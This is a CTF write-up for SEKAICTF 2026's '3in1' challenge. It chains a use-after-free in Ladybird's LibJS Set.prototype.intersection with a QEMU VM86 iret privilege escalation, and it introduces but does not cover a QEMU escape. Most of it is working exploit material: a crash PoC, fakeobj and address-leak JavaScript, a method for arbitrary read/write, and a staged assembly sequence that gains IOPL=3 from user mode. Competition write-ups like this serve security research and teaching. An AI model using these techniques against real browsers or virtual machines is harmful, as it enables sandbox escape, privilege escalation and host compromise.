SEKAICTF 2026: 3in1

Jun 29, 2026

A full-chain SEKAICTF 2026 challenge covering Ladybird, a QEMU LPE, and a QEMU escape.

With a clear decline in competitiveness across the board for CTFs now that AI has taken over, we decided to make some harder challenges for this last year. So I’ve created two challenges for SEKAICTF this year, starting with a full chain that combines two 0days with a new way to exploit an n-day using fewer primitives than the previous researchers from ottersec had.

Components

Ladybird
QEMU LPE
QEMU escape

3in1: Ladybird

Qyn

Jun 29, 2026

#pwn #ctf #sekaictf

Ladybird 0day

The first part of the challenge is to escape the Ladybird LibJS shell. This requires a 0day, since we’re running pretty much the latest version. I had been planning to do a LibJS challenge for a while, since I had been hoarding a 0day for over a year (ever since I last saw a Ladybird challenge). Sadly, it was patched some time before the CTF started.

Another funny thing happened two weeks before the CTF, when the LibJS (/ Ladybird) part was already done: a commit dropped that killed my original exploitation technique for this new bug.

Bug

So since our last 0day had been patched, we had to find a new one. For the challenge itself, I patched out all the internal functions, except gc() (I was feeling nice), and compiled a JS-only shell.

The intended bug for this challenge lies in Set.prototype.intersection:

// 24.2.4.9 Set.prototype.intersection ( other ), https://tc39.es/ecma262/#sec-set.prototype.intersection
JS_DEFINE_NATIVE_FUNCTION(SetPrototype::intersection)
{
    auto& realm = *vm.current_realm();

    // 1. Let O be the this value.
    // 2. Perform ? RequireInternalSlot(O, [[SetData]]).
    auto set = TRY(typed_this_object(vm));

    // 3. Let otherRec be ? GetSetRecord(other).
    auto other_record = TRY(get_set_record(vm, vm.argument(0)));

    // 4. Let resultSetData be a new empty List.
    auto result = Set::create(realm);

    // 5. If SetDataSize(O.[[SetData]]) ≤ otherRec.[[Size]], then
    if (set->set_size() <= other_record.size) {
        // a. Let thisSize be the number of elements in O.[[SetData]].
        // b. Let index be 0.
        // c. Repeat, while index < thisSize,
        for (auto const& element : *set) { // [1]. BUG
            // i. Let e be O.[[SetData]][index].
            // ii. Set index to index + 1.
            // iii. If e is not empty, then
            //     1. Let inOther be ToBoolean(? Call(otherRec.[[Has]], otherRec.[[SetObject]], « e »)).
            auto in_other = TRY(call(vm, *other_record.has, other_record.set_object, element.key)).to_boolean();

            //     2. If inOther is true, then
            if (in_other) {
                // a. NOTE: It is possible for earlier calls to otherRec.[[Has]] to remove and re-add an element of O.[[SetData]], which can cause the same element to be visited twice during this iteration.
                // b. If SetDataHas(resultSetData, e) is false, then
                if (!set_data_has(result, element.key)) {
                    // i. Append e to resultSetData.
                    result->set_add(element.key);
                }
            }

            //     3. NOTE: The number of elements in O.[[SetData]] may have increased during execution of otherRec.[[Has]].
            //     4. Set thisSize to the number of elements in O.[[SetData]].
        }
    }
    // 6. Else,
    else {
        // a. Let keysIter be ? GetIteratorFromMethod(otherRec.[[SetObject]], otherRec.[[Keys]]).
        auto keys_iterator = TRY(get_iterator_from_method(vm, other_record.set_object, other_record.keys));

        // b. Let next be NOT-STARTED.
        Optional<Value> next;

        // c. Repeat, while next is not DONE,
        do {
            // i. Set next to ? IteratorStepValue(keysIter).
            next = TRY(iterator_step_value(vm, keys_iterator));

            // ii. If next is not DONE, then
            if (next.has_value()) {
                // 1. Set next to CanonicalizeKeyedCollectionKey(next).
                next = canonicalize_keyed_collection_key(*next);

                // 2. Let inThis be SetDataHas(O.[[SetData]], next).
                auto in_this = set_data_has(set, *next);

                // 3. If inThis is true, then
                if (in_this) {
                    // a. NOTE: Because other is an arbitrary object, it is possible for its "keys" iterator to produce the same value more than once.

                    // b. If SetDataHas(resultSetData, next) is false, then
                    if (!set_data_has(result, *next)) {
                        // i. Append next to resultSetData.
                        result->set_add(*next);
                    }
                }
            }
        } while (next.has_value());
    }

    // 7. Let result be OrdinaryObjectCreate(%Set.prototype%, « [[SetData]] »).
    // 8. Set result.[[SetData]] to resultSetData.

    // 9. Return result.
    return result;
}

The bug here is auto const& element : *set, where element is not a copy, but a reference into the backing store of the set. A Set in LibJS is backed by a Map:

class JS_API Set : public Object {
    JS_OBJECT(Set, Object);
    GC_DECLARE_ALLOCATOR(Set);

public:
    static GC::Ref<Set> create(Realm&);

    virtual void initialize(Realm&) override;
    virtual ~Set() override = default;

    virtual bool is_set_object() const final { return true; }

    // NOTE: Unlike what the spec says, we implement Sets using an underlying map,
    //       so all the functions below do not directly implement the operations as
    //       defined by the specification.

    void set_clear() { m_values->map_clear(); }
    bool set_remove(Value const& value) { return m_values->map_remove(value); }
    bool set_has(Value const& key) const { return m_values->map_has(key); }
    void set_add(Value const& key) { m_values->map_set(key, js_undefined()); }
    size_t set_size() const { return m_values->map_size(); }

    auto begin() const { return const_cast<Map const&>(*m_values).begin(); }
    auto begin() { return m_values->begin(); }
    auto end() const { return m_values->end(); }

    GC::Ref<Set> copy() const;

private:
    explicit Set(Object& prototype);

    virtual void visit_edges(Visitor& visitor) override;

    GC::Ptr<Map> m_values;
};

// 24.2.1.1 Set Records, https://tc39.es/ecma262/#sec-set-records
struct SetRecord {
    GC::Ref<Object const> set_object; // [[SetObject]]
    double size { 0 };                // [[Size]]
    GC::Ref<FunctionObject> has;      // [[Has]]
    GC::Ref<FunctionObject> keys;     // [[Keys]]
};

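Here, clearing the Set goes through set_clear(), i.e. Map::map_clear(), which basically frees the backing HashTable while the loop above still holds a reference into it.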

So an easy PoC for this is:

let key = {};
let s = new Set([key]);

let other = {
    size: 1,
    has() {
        s.clear();   // frees/replaces storage being iterated
        return true;
    },
    keys() {
        return [][Symbol.iterator]();
    },
};

let result = s.intersection(other);
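For contrast, here is a minimal sketch of what the spec's index-based loop (steps 5.a to 5.c) does with the same PoC. It is only a model, not LibJS code: the Set data is a plain array, `EMPTY` stands in for the spec's empty marker, and `intersectSmallThis` and the `model*` names are made up for illustration. The point is that `e` is copied out of the list before `has()` runs, so clearing the Set cannot leave the loop holding a stale reference.

```javascript
// Hypothetical model of steps 5.a-5.c of Set.prototype.intersection.
// EMPTY marks a removed slot, like the spec's "empty" list element.
const EMPTY = Symbol("empty");

function intersectSmallThis(setData, otherRec) {
  const result = [];
  let index = 0;
  let thisSize = setData.length;
  while (index < thisSize) {
    // Copy the element out *before* any user code can run.
    const e = setData[index];
    index += 1;
    if (e !== EMPTY) {
      const inOther = Boolean(otherRec.has.call(otherRec.setObject, e));
      if (inOther && !result.includes(e)) {
        result.push(e);
      }
      // Re-read the size: has() may have appended elements.
      thisSize = setData.length;
    }
  }
  return result;
}

// Same shape as the PoC: has() clears the set while it is being walked.
const modelKey = {};
const modelData = [modelKey];
const modelOther = {
  setObject: null,
  has() {
    modelData.fill(EMPTY); // spec-style clear: slots become empty, nothing is freed
    return true;
  },
};

const modelResult = intersectSmallThis(modelData, modelOther);
console.log(modelResult.length, modelResult[0] === modelKey, modelData[0] === EMPTY);
```

In this model the result still contains the key and the source list is simply empty afterwards, which is the behaviour the range-based for loop in LibJS fails to preserve.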

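Note (where we mimic a Set): other only has to pass GetSetRecord, so a plain object with a numeric size and callable has and keys is enough.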

// 24.2.1.2 GetSetRecord ( obj ), https://tc39.es/ecma262/#sec-getsetrecord
ThrowCompletionOr<SetRecord> get_set_record(VM& vm, Value value)
{
    // 1. If obj is not an Object, throw a TypeError exception.
    if (!value.is_object())
        return vm.throw_completion<TypeError>(ErrorType::NotAnObject, value);
    auto const& object = value.as_object();

    // 2. Let rawSize be ? Get(obj, "size").
    auto raw_size = TRY(object.get(vm.names.size));

    // 3. Let numSize be ? ToNumber(rawSize).
    auto number_size = TRY(raw_size.to_number(vm));

    // 4. NOTE: If rawSize is undefined, then numSize will be NaN.
    // 5. If numSize is NaN, throw a TypeError exception.
    if (number_size.is_nan())
        return vm.throw_completion<TypeError>(ErrorType::NumberIsNaN, "size"sv);

    // 6. Let intSize be ! ToIntegerOrInfinity(numSize).
    auto integer_size = MUST(number_size.to_integer_or_infinity(vm));

    // 7. If intSize < 0, throw a RangeError exception.
    if (integer_size < 0)
        return vm.throw_completion<RangeError>(ErrorType::NumberIsNegative, "size"sv);

    // 8. Let has be ? Get(obj, "has").
    auto has = TRY(object.get(vm.names.has));

    // 9. If IsCallable(has) is false, throw a TypeError exception.
    if (!has.is_function())
        return vm.throw_completion<TypeError>(ErrorType::NotAFunction, has);

    // 10. Let keys be ? Get(obj, "keys").
    auto keys = TRY(object.get(vm.names.keys));

    // 11. If IsCallable(keys) is false, throw a TypeError exception.
    if (!keys.is_function())
        return vm.throw_completion<TypeError>(ErrorType::NotAFunction, keys);

    // 12. Return a new Set Record { [[SetObject]]: obj, [[Size]]: intSize, [[Has]]: has, [[Keys]]: keys }.
    return SetRecord { .set_object = object, .size = integer_size, .has = has.as_function(), .keys = keys.as_function() };
}

This gives us a free UaF on element.key, which, for a Set backed by a Map, is the stored object itself.

Exploit

The first primitive we can easily create from this is fakeobj:

function fakeobj(addr) {
    let encoded = OBJECT_TAG | (addr & PAYLOAD_MASK);
    let payload_b64 = encoded_value_payload(encoded);
    let keep = [];
    let key = {};
    let s = new Set([key]);

    let other = {
        size: 1,
        has() {
            s.clear();

            let scratch = new Uint8Array(FAKEOBJ_RECLAIM_SIZE);
            let dv = new DataView(scratch.buffer);

            scratch.setFromBase64(payload_b64);
            keep.push(scratch);

            return true;
        },
        keys() {
            return [][Symbol.iterator]();
        }
    };

    return Array.from(s.intersection(other))[0];
}
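The helpers used by fakeobj are not shown here, so the following is only a sketch of what an `encoded_value_payload`-style helper could look like. Everything in it is an assumption: the tag constant is my guess at LibJS's NaN-boxing layout and should be checked against Value.h of the target build, the address is made up, and `encodedValuePayloadSketch` simply repeats one 64-bit word so that the fake Value is present wherever the old key slot ends up inside the reclaimed buffer.

```javascript
// Assumed NaN-boxing constants; verify against Value.h before relying on them.
const ASSUMED_OBJECT_TAG = 0xfff9n << 48n;
const ASSUMED_PAYLOAD_MASK = (1n << 48n) - 1n;

// Hypothetical stand-in for encoded_value_payload(): repeat one 64-bit word
// (little-endian) across `size` bytes and return the buffer as base64.
function encodedValuePayloadSketch(encoded, size) {
  const bytes = new Uint8Array(size);
  const view = new DataView(bytes.buffer);
  for (let off = 0; off + 8 <= size; off += 8) {
    view.setBigUint64(off, encoded, true);
  }
  let binary = "";
  for (const b of bytes) {
    binary += String.fromCharCode(b);
  }
  return btoa(binary);
}

const fakeAddr = 0x7f0012345678n; // made-up address, for illustration only
const encodedWord = ASSUMED_OBJECT_TAG | (fakeAddr & ASSUMED_PAYLOAD_MASK);
const payloadB64 = encodedValuePayloadSketch(encodedWord, 16);
console.log(encodedWord.toString(16), payloadB64);
```

The sketch uses `btoa` only because it is widely available; inside the challenge shell any base64 source that `setFromBase64` accepts would do.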

For a leak we do the following:

function leak_ptr_try_for(candidates, iter) {
    let keep = [];
    let set_key = { set_key: iter };
    let s = new Set([set_key]);

    let other = {
        size: 1,
        has() {
            s.clear(); // [1]
            gc();

            for (let j = 0; j < 192; ++j) {
                let wm = new WeakMap();
                wm.set(candidates[(iter + j) % candidates.length], 0x1337);
                keep.push(wm);
            }

            return true;
        },
        keys() {
            return [][Symbol.iterator]();
        },
    };

    let v = Array.from(s.intersection(other))[0];
    if (typeof v !== "number" || v === 0)
        return 0n;

    let bits = f64_to_u64(v);
    if (!looks_like_ptr(bits))
        return 0n;
    return bits;
}

This frees the backing buckets at [1], runs gc(), and creates WeakMaps whose backing store overlaps with the old Set storage.

Just like a regular Set, a WeakMap is backed by a HashMap, but here it is HashMap<GC::Ptr<Cell>, Value> m_values instead of the HashMap<Value, Value, ValueTraits> m_entries used by a Map (and therefore by a Set).

So we try to reclaim a Value from the Set (8 bytes) with a GC::Ptr<Cell> from the WeakMap (also 8 bytes, a raw pointer). Read back as a Value, that pointer is a plain f64, which is our leak.

This is basically our addrOf primitive, which we can use to target an ArrayBuffer as the victim.
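To make the "pointer read back as an f64" step concrete, here is a small sketch of the bit reinterpretation involved. The helper names are my own (the solver's `f64_to_u64` and `looks_like_ptr` are not shown), the pointer value is made up, and the pointer check is just one plausible heuristic. A user-space pointer has its top 16 bits clear, so as a double it is a tiny positive subnormal, which is why the leak function checks for a nonzero number.

```javascript
// Reinterpret the 64 bits of a double as an unsigned integer and back.
const scratchView = new DataView(new ArrayBuffer(8));

function f64ToU64(value) {
  scratchView.setFloat64(0, value, true);
  return scratchView.getBigUint64(0, true);
}

function u64ToF64(bits) {
  scratchView.setBigUint64(0, bits, true);
  return scratchView.getFloat64(0, true);
}

// Hypothetical heuristic: non-null, 8-byte aligned, inside the 47-bit user range.
function looksLikePtr(bits) {
  return bits !== 0n && bits < (1n << 47n) && (bits & 7n) === 0n;
}

const rawPointer = 0x7f0012345680n;    // made-up cell address
const asNumber = u64ToF64(rawPointer); // what the engine hands back as a Value
const recovered = f64ToU64(asNumber);

console.log(typeof asNumber, asNumber > 0);
console.log(recovered === rawPointer, looksLikePtr(recovered));
```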

From here there are many ways to turn r/w into code execution. Here is one example:

let map = new Map();
map.set(bucket0, u64ToF64(MAP_FAKE_HEADER));
map.set(bucket1, u64ToF64(validationAddr));

let iterator = map.entries();
iterator.a = u64ToF64(MAP_FAKE_HEADER);

Here bucket0 and bucket1 are chosen so that their hashes land in the first and second bucket respectively. Then we leak the address of the MapIterator object and reinterpret its memory as follows:

Real memory address	Real `MapIterator` field	Fake reader `JS::Object` field
`I + 0x28`	`Object::m_private_elements`	`reader + 0x00` vptr-ish word
`I + 0x30`	`Object::m_inline_named_storage[0] == iterator.a == MAP_FAKE_HEADER`	`reader + 0x08` flags/kind/length
`I + 0x38`	`Object::m_inline_named_storage[1]`	`reader + 0x10 = m_shape`
`I + 0x40`	BuiltinIterator vptr	`reader + 0x18` `m_named_properties`
`I + 0x48`	`MapIterator::m_map`	`reader + 0x20 = m_indexed_elements`
`I + 0x50`	`m_done / m_iteration_kind`	`reader + 0x28 = m_private_elements`
`I + 0x58`	`MapIterator::m_iterator`	`reader + 0x30` inline storage
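The table boils down to one constant: the fake reader object starts 0x28 bytes into the real MapIterator. A tiny sketch of that arithmetic, with the offsets copied from the table and `READER_DELTA` and `fakeOffsetFor` being names I made up:

```javascript
// Distance between the real MapIterator (I) and the fake reader, per the table.
const READER_DELTA = 0x28;

// (real offset, fake offset, fake field) rows copied from the table above.
const overlay = [
  { real: 0x28, fake: 0x00, fakeField: "vptr-ish word" },
  { real: 0x30, fake: 0x08, fakeField: "flags/kind/length" },
  { real: 0x38, fake: 0x10, fakeField: "m_shape" },
  { real: 0x40, fake: 0x18, fakeField: "m_named_properties" },
  { real: 0x48, fake: 0x20, fakeField: "m_indexed_elements" },
  { real: 0x50, fake: 0x28, fakeField: "m_private_elements" },
  { real: 0x58, fake: 0x30, fakeField: "inline storage" },
];

// Which fake field does a given real MapIterator offset land on?
function fakeOffsetFor(realOffset) {
  return realOffset - READER_DELTA;
}

for (const row of overlay) {
  console.log(
    `I+0x${row.real.toString(16)} -> reader+0x${fakeOffsetFor(row.real).toString(16)} (${row.fakeField})`
  );
}
```

The two rows that matter are I + 0x30, where the attacker-controlled iterator.a supplies the fake header, and I + 0x48, where MapIterator::m_map is read as m_indexed_elements.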

So now we can read, e.g., reader[13] == reader->m_indexed_elements[13] == iterator->m_map[13]. From there we can recover the bucket pointer (bucket == reader[13]) and read/write into the buckets array, which has the following layout:

+0x00  bucket0 Entry.key/
+0x08  bucket0 Entry.value = header == flags/kind/length
+0x10  bucket1 state/hash/padding
+0x18  bucket1 Entry.key
+0x20  bucket1 Entry.value = target pointer == m_indexed_elements

Then we can fakeobj over bucket+8 to mirror the MapIterator as before and get a limited read/write by overwriting m_indexed_elements using map.set(bucket1, u64ToF64(addr)). From there we repeatedly target an ArrayBuffer’s data pointer to get full arbitrary r/w. Finally we leak the vtable, get libc, read environ, find a return address on the stack, and ROP to execve to run our next stage.

Footnote (fakeobj): we use base64 (setFromBase64) to fill the buffer so that the freed storage is not accidentally reclaimed by other objects.

3in1: QEMU LPE

Escalating privileges inside QEMU through a VM86 iret bug.

For the second part of the challenge, we need to somehow gain root (or at least higher privileges) to talk to the virtio-snd device. I had been hoarding a 0day for this as well for a little while, so it was a perfect fit for this challenge. Although a current 0day has already been published (without patches) by kqx, the challenge introduces a patch for it and we have to hunt for a new one.

Bug

The bug is actually a slight variant of https://kqx.io/post/qemu-nday/ but the primitive is even better:

/* protected mode iret */
static inline void helper_ret_protected(CPUX86State *env, int shift,
                                        int is_iret, int addend,
                                        uintptr_t retaddr)
{
    uint32_t new_cs, new_eflags, new_ss;
    uint32_t new_es, new_ds, new_fs, new_gs;
    uint32_t e1, e2, ss_e1, ss_e2;
    int cpl, dpl, rpl, eflags_mask, iopl;
    target_ulong new_eip, new_esp;
    StackAccess sa;

    cpl = env->hflags & HF_CPL_MASK;

    sa.env = env;
    sa.ra = retaddr;
    sa.mmu_index = x86_mmu_index_pl(env, cpl);

#ifdef TARGET_X86_64
    if (shift == 2) {
        sa.sp_mask = -1;
    } else
#endif
    {
        sa.sp_mask = get_sp_mask(env->segs[R_SS].flags);
    }
    sa.sp = env->regs[R_ESP];
    sa.ss_base = env->segs[R_SS].base;
    new_eflags = 0; /* avoid warning */
#ifdef TARGET_X86_64
    if (shift == 2) {
        new_eip = popq(&sa);
        new_cs = popq(&sa) & 0xffff;
        if (is_iret) {
            new_eflags = popq(&sa);
        }
    } else
#endif
    {
        if (shift == 1) {
            /* 32 bits */
            new_eip = popl(&sa);
            new_cs = popl(&sa) & 0xffff;
            if (is_iret) {
                new_eflags = popl(&sa);
                if (new_eflags & VM_MASK) {
                    goto return_to_vm86;
                }
            }
        } else {
            /* 16 bits */
            new_eip = popw(&sa);
            new_cs = popw(&sa);
            if (is_iret) {
                new_eflags = popw(&sa);
            }
        }
    }
    LOG_PCALL("lret new %04x:" TARGET_FMT_lx " s=%d addend=0x%x\n",
              new_cs, new_eip, shift, addend);
    LOG_PCALL_STATE(env_cpu(env));
    if ((new_cs & 0xfffc) == 0) {
        raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
    }
    if (load_segment_ra(env, &e1, &e2, new_cs, retaddr) != 0) {
        raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
    }
    if (!(e2 & DESC_S_MASK) ||
        !(e2 & DESC_CS_MASK)) {
        raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
    }
    rpl = new_cs & 3;
    if (rpl < cpl) {
        raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
    }
    dpl = (e2 >> DESC_DPL_SHIFT) & 3;
    if (e2 & DESC_C_MASK) {
        if (dpl > rpl) {
            raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
        }
    } else {
        if (dpl != rpl) {
            raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
        }
    }
    if (!(e2 & DESC_P_MASK)) {
        raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, retaddr);
    }

    sa.sp += addend;
    if (rpl == cpl && (!(env->hflags & HF_CS64_MASK) ||
                       ((env->hflags & HF_CS64_MASK) && !is_iret))) {
        /* return to same privilege level */
        cpu_x86_load_seg_cache(env, R_CS, new_cs,
                       get_seg_base(e1, e2),
                       get_seg_limit(e1, e2),
                       e2);
    } else {
        /* return to different privilege level */
#ifdef TARGET_X86_64
        if (shift == 2) {
            new_esp = popq(&sa);
            new_ss = popq(&sa) & 0xffff;
        } else
#endif
        {
            if (shift == 1) {
                /* 32 bits */
                new_esp = popl(&sa);
                new_ss = popl(&sa) & 0xffff;
            } else {
                /* 16 bits */
                new_esp = popw(&sa);
                new_ss = popw(&sa);
            }
        }
        LOG_PCALL("new ss:esp=%04x:" TARGET_FMT_lx "\n",
                  new_ss, new_esp);
        if ((new_ss & 0xfffc) == 0) {
#ifdef TARGET_X86_64
            /* NULL ss is allowed in long mode if cpl != 3 */
            /* XXX: test CS64? */
            if ((env->hflags & HF_LMA_MASK) && rpl != 3) {
                cpu_x86_load_seg_cache(env, R_SS, new_ss,
                                       0, 0xffffffff,
                                       DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
                                       DESC_S_MASK | (rpl << DESC_DPL_SHIFT) |
                                       DESC_W_MASK | DESC_A_MASK);
                ss_e2 = DESC_B_MASK; /* XXX: should not be needed? */
            } else
#endif
            {
                raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr);
            }
        } else {
            if ((new_ss & 3) != rpl) {
                raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
            }
            if (load_segment_ra(env, &ss_e1, &ss_e2, new_ss, retaddr) != 0) {
                raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
            }
            if (!(ss_e2 & DESC_S_MASK) ||
                (ss_e2 & DESC_CS_MASK) ||
                !(ss_e2 & DESC_W_MASK)) {
                raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
            }
            dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3;
            if (dpl != rpl) {
                raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
            }
            if (!(ss_e2 & DESC_P_MASK)) {
                raise_exception_err_ra(env, EXCP0B_NOSEG, new_ss & 0xfffc, retaddr);
            }
            cpu_x86_load_seg_cache(env, R_SS, new_ss,
                                   get_seg_base(ss_e1, ss_e2),
                                   get_seg_limit(ss_e1, ss_e2),
                                   ss_e2);
        }

        cpu_x86_load_seg_cache(env, R_CS, new_cs,
                       get_seg_base(e1, e2),
                       get_seg_limit(e1, e2),
                       e2);
        sa.sp = new_esp;
#ifdef TARGET_X86_64
        if (env->hflags & HF_CS64_MASK) {
            sa.sp_mask = -1;
        } else
#endif
        {
            sa.sp_mask = get_sp_mask(ss_e2);
        }

        /* validate data segments */
        validate_seg(env, R_ES, rpl);
        validate_seg(env, R_DS, rpl);
        validate_seg(env, R_FS, rpl);
        validate_seg(env, R_GS, rpl);

        sa.sp += addend;
    }
    SET_ESP(sa.sp, sa.sp_mask);
    env->eip = new_eip;
    if (is_iret) {
        /* NOTE: 'cpl' is the _old_ CPL */
        eflags_mask = TF_MASK | AC_MASK | ID_MASK | RF_MASK | NT_MASK;
        if (cpl == 0) {
            eflags_mask |= IOPL_MASK;
        }
        iopl = (env->eflags >> IOPL_SHIFT) & 3;
        if (cpl <= iopl) {
            eflags_mask |= IF_MASK;
        }
        if (shift == 0) {
            eflags_mask &= 0xffff;
        }
        cpu_load_eflags(env, new_eflags, eflags_mask);
    }
    return;

 return_to_vm86:
    new_esp = popl(&sa);
    new_ss = popl(&sa);
    new_es = popl(&sa);
    new_ds = popl(&sa);
    new_fs = popl(&sa);
    new_gs = popl(&sa);

    /* modify processor state */
    cpu_load_eflags(env, new_eflags, TF_MASK | AC_MASK | ID_MASK |
                    IF_MASK | IOPL_MASK | VM_MASK | NT_MASK | VIF_MASK |
                    VIP_MASK);
    load_seg_vm(env, R_CS, new_cs & 0xffff);
    load_seg_vm(env, R_SS, new_ss & 0xffff);
    load_seg_vm(env, R_ES, new_es & 0xffff);
    load_seg_vm(env, R_DS, new_ds & 0xffff);
    load_seg_vm(env, R_FS, new_fs & 0xffff);
    load_seg_vm(env, R_GS, new_gs & 0xffff);

    env->eip = new_eip & 0xffff;
    env->regs[R_ESP] = new_esp;
}

The issue here is that QEMU jumps to return_to_vm86 as soon as EFLAGS.VM is set in the popped flags, before rejecting this transition from user mode. return_to_vm86 then loads EFLAGS with VM_MASK and IOPL_MASK allowed, so we can set IOPL=3, which in QEMU gives arbitrary physical r/w again. Amazing work from the kqx people.
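As a quick sanity check on the flag bits involved, here is a sketch that builds the EFLAGS image such a frame needs and models the check that is missing. The bit positions are architectural; `makeVm86Eflags`, `ioplOf` and `mayReturnToVm86` are illustrative names of mine, and the CPL condition is how I read the IRET pseudocode in the Intel SDM rather than a quote of any QEMU patch.

```javascript
// Architectural EFLAGS bits (same values as QEMU's *_MASK macros).
const EFLAGS_FIXED_BIT1 = 1 << 1;  // reserved bit, always 1
const IOPL_SHIFT = 12;
const IOPL_MASK = 3 << IOPL_SHIFT; // 0x3000
const VM_MASK = 1 << 17;           // 0x20000

function makeVm86Eflags(iopl) {
  return (VM_MASK | (iopl << IOPL_SHIFT) | EFLAGS_FIXED_BIT1) >>> 0;
}

function ioplOf(eflags) {
  return (eflags & IOPL_MASK) >>> IOPL_SHIFT;
}

// Assumed architectural rule: IRET may only enter VM86 when the popped
// EFLAGS has VM set *and* the current privilege level is 0.
function mayReturnToVm86(newEflags, cpl) {
  return (newEflags & VM_MASK) !== 0 && cpl === 0;
}

const frameEflags = makeVm86Eflags(3);
console.log("0x" + frameEflags.toString(16).padStart(8, "0")); // 0x00023002
console.log(ioplOf(frameEflags));                               // 3
console.log(mayReturnToVm86(frameEflags, 3));                   // false: ring 3 must not get here
```

The resulting value, 0x00023002, is the EFLAGS word pushed in Stage 1 of the exploit below.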

Exploit

It’s easiest to walk through the full exploit path to show what is happening:

; ============================================================
; Stage 0: normal 64-bit userland
; CS = 0x33, RIP = inside child_iopl_probe()
; ============================================================

pushq 0x23              ; USER32_CS, Linux 32-bit compat code selector
pushq 0x00100000        ; 32-bit entrypoint
lretq                   ; far return: pop RIP/EIP + CS

; Now:
;   CS  = 0x23
;   EIP = 0x00100000
; Execution is 32-bit compat code.


; ============================================================
; Stage 1: 32-bit compat stub at 0x00100000
; ============================================================

[BITS 32]
mov esp, 0x00022000

push 0x00001000         ; GS for VM86
push 0x00001000         ; FS for VM86
push 0x00001000         ; DS for VM86
push 0x00001000         ; ES for VM86
push 0x00002000         ; SS for VM86
push 0x00008000         ; ESP for VM86
push 0x00023002         ; EFLAGS: VM=1, IOPL=3, bit1=1
push 0x00001000         ; CS for VM86
push 0x00000000         ; EIP for VM86
iretd                   ; opcode 0xcf

; QEMU sees VM=1 in the iret frame and takes return_to_vm86
; which loads IOPL from attacker-controlled EFLAGS
;
; Now:
;   VM86 mode
;   CS:IP = 0x1000:0x0000
;   linear RIP = 0x10000
;   SS:SP = 0x2000:0x8000
;   EFLAGS has IOPL=3


; ============================================================
; Stage 2: VM86 code at 0x00010000
; ============================================================

[BITS 16]
mov ax, 0x3000
mov ds, ax              ; DS base = 0x3000 << 4 = 0x30000

o32 mov eax, 20         ; i386 syscall number 20 = getpid
o32 mov ebp, 0x00028100 ; landing_stack
o32 mov esp, 0x00028100 ; landing_stack

sysenter                ; enter Linux compat syscall path


; ============================================================
; Stage 3: Linux compat sysenter return path
; It returns to a patched vDSO landing pad.
; we overwrite that pad with:
; ============================================================

[BITS 32]
pop ebp                 ; consumes 0x41414141
pop edx                 ; consumes 0x42424242
pop ecx                 ; consumes 0x43434343
ret                     ; returns to after32

; landing_stack contains:
;   [0x28100] = 0x41414141
;   [0x28104] = 0x42424242
;   [0x28108] = 0x43434343
;   [0x2810c] = after32


; ============================================================
; Stage 4: after32, same linear page, now 32-bit compat mode
; ============================================================

[BITS 32]
mov ax, 0x2b            ; USER_DS
mov ds, ax

pushfd
pop eax

push 0x33               ; USER64_CS
push 0x00101000         ; 64-bit stub address
retf                    ; far return back to 64-bit user code

; Now:
;   CS  = 0x33
;   RIP = 0x00101000


; ============================================================
; Stage 5: 64-bit stub at 0x00101000
; ============================================================

[BITS 64]
mov rsp, safe_rsp
mov rax, after_iopl
jmp rax


; ============================================================
; Stage 6: normal 64-bit C again, but with IOPL=3
; ============================================================

pushfq
pop rax

cli
sti                     ; succeeds only if IOPL=3
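The Stage 1 frame is easy to get backwards, so here is a small sketch that replays the pushes on a modelled stack, pops them in the order helper_ret_protected() uses for a 32-bit iret into VM86, and computes the resulting VM86 linear addresses. The stack model and the names `buildIretFrame`, `popFrame` and `vm86Linear` are hypothetical helpers; only the values come from the listing above.

```javascript
// Model a 32-bit stack as a Map from address to dword.
function buildIretFrame(initialEsp, pushes) {
  const memory = new Map();
  let esp = initialEsp;
  for (const value of pushes) {
    esp -= 4;
    memory.set(esp, value >>> 0);
  }
  return { memory, esp };
}

// Pop order: EIP, CS, EFLAGS first, then the return_to_vm86 label pops the rest.
const POP_ORDER = ["eip", "cs", "eflags", "esp", "ss", "es", "ds", "fs", "gs"];

function popFrame(memory, esp) {
  const regs = {};
  let cursor = esp;
  for (const name of POP_ORDER) {
    regs[name] = memory.get(cursor);
    cursor += 4;
  }
  return regs;
}

// VM86 uses real-mode style addressing: linear = (segment << 4) + offset.
function vm86Linear(segment, offset) {
  return ((segment & 0xffff) << 4) + (offset & 0xffff);
}

// Same push sequence as Stage 1.
const frame = buildIretFrame(0x00022000, [
  0x1000, 0x1000, 0x1000, 0x1000, // GS, FS, DS, ES
  0x2000, 0x8000,                 // SS, ESP
  0x00023002,                     // EFLAGS: VM=1, IOPL=3, bit1=1
  0x1000, 0x0000,                 // CS, EIP
]);
const vmRegs = popFrame(frame.memory, frame.esp);

console.log(frame.esp.toString(16));                            // 21fdc
console.log(vm86Linear(vmRegs.cs, vmRegs.eip).toString(16));    // 10000
console.log(vm86Linear(vmRegs.ss, vmRegs.esp).toString(16));    // 28000
```

This matches the comments in the listing: code resumes at linear 0x10000 and the VM86 stack sits at 0x28000, just below the landing_stack at 0x28100.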

After which we use the kqx.io technique to obtain physical r/w.

Aftermath

After the CTF I was told that there was some public work on this specific bug: https://patchew.org/QEMU/20260528113808.86036-1-misetic@osec.io/ and https://lore.kernel.org/qemu-devel/20260622082119.11903-1-apolivodaa433@gmail.com/

Thankfully the bug wasn’t patched in time for the CTF :)

3in1: QEMU Escape

Escaping QEMU by targeting the TCG software TLB from virtio-snd.

Finally we get to exploit QEMU. A different patch reintroduces a bug previously exploited by ottersec. Before reading through the next part, I recommend reading through their writeup to get an understanding of the problem, as I’ll just go over the exploitation of that bug.

Anyway, ottersec needed another device driver to escape the guest. This challenge doesn’t give you this luxury and you have to exploit (escape) the guest without it.

